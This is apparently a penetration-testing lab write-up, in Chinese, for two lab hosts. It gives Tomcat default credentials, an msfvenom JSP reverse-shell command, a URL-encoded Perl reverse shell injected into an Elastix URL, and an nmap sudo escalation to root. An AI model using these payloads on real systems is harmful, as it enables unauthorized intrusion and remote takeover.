10.11.1.209
Nikto 扫描得到:Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
访问8080端口,找到后台登录地址,尝试tomcat tomcat 顺利登录后台。
Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Multiple remote Exploit
https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/18619.zip
反弹shell,拿到root权限。cat /Desktop/proof.txt
(未尝试的解法)msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.45 LPORT=1337 -f war > reverse.war
10.11.1.217
admin admin 进入后台,找到版本为2.2.0 sear…搜索Elastix 2.2.0 采用exploits/php/webapps/18650.py
提取并修改代码为:
https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0Adata:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.101%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
访问得到shell。按照18650.py中的说明:
sudo nmap –interactive
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
得到root权限。
